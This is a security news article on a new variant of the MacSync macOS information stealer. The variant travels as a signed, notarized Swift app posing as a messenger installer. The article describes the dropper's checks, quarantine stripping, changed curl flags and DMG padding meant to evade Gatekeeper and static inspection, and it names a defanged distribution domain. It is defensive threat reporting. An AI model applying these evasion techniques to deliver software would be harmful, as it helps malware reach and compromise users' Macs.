Security analysts have identified a new variant of the macOS information-stealing malware MacSync, delivered via a digitally signed and notarized Swift application that impersonates a messaging app installer in order to bypass Apple’s Gatekeeper controls.

“Unlike earlier MacSync Stealer variants that primarily rely on drag-to-terminal or -style techniques, this sample adopts a more deceptive, hands-off approach,” Jamf researcher Thijs Xhaflaire said.

The Apple device management and security vendor noted that the current build is distributed as a code-signed and notarized Swift application packaged inside a disk image (DMG) named “zk-call-messenger-installer-3.9.2-lts.dmg,” which is made available from “zkcall[.]net/download.”

Because the app is signed and notarized, it executes without being immediately stopped or alerted on by native macOS protections such as Gatekeeper or XProtect. Even so, the installer presents users with instructions to right-click and open the app, a pattern frequently used to work around default launch protections. Apple has subsequently revoked the associated code-signing certificate.

After launch, the Swift-based dropper performs several checks before retrieving and running an encoded script via a helper component. These checks include confirming internet connectivity, enforcing a minimum delay of roughly 3600 seconds between executions to rate-limit activity, stripping quarantine attributes, and validating the downloaded file before running it.

“Notably, the curl command used to retrieve the payload shows clear deviations from earlier variants,” Xhaflaire explained. “Rather than using the commonly seen -fsSL combination, the flags have been split into -fL and -sS, and additional options like –noproxy have been introduced.”

“These changes, along with the use of dynamically populated variables, point to a deliberate shift in how the payload is fetched and validated, likely aimed at improving reliability or evading detection.”

The campaign also incorporates an additional evasion tactic by inflating the DMG size to 25.5 MB, padding it with unrelated PDF files to make static inspection and heuristic size-based checks less reliable.

The Base64-encoded payload, once decoded, maps to MacSync, a rebranded iteration of Mac.c first observed in April 2025. According to MacPaw’s Moonlock Lab, MacSync comes fitted with a fully featured Go-based agent that extends beyond simple credential or data theft, providing full remote command-and-control functionality.

Signed malicious DMG files spoofing Google Meet have similarly been used in intrusions distributing other macOS stealers such as Odyssey. At the same time, threat actors have continued to deliver DigitStealer using unsigned disk images as recently as last month.

“This shift in distribution reflects a broader trend across the macOS malware landscape, where attackers increasingly attempt to sneak their malware into executables that are signed and notarized, allowing them to look more like legitimate applications,” Jamf said.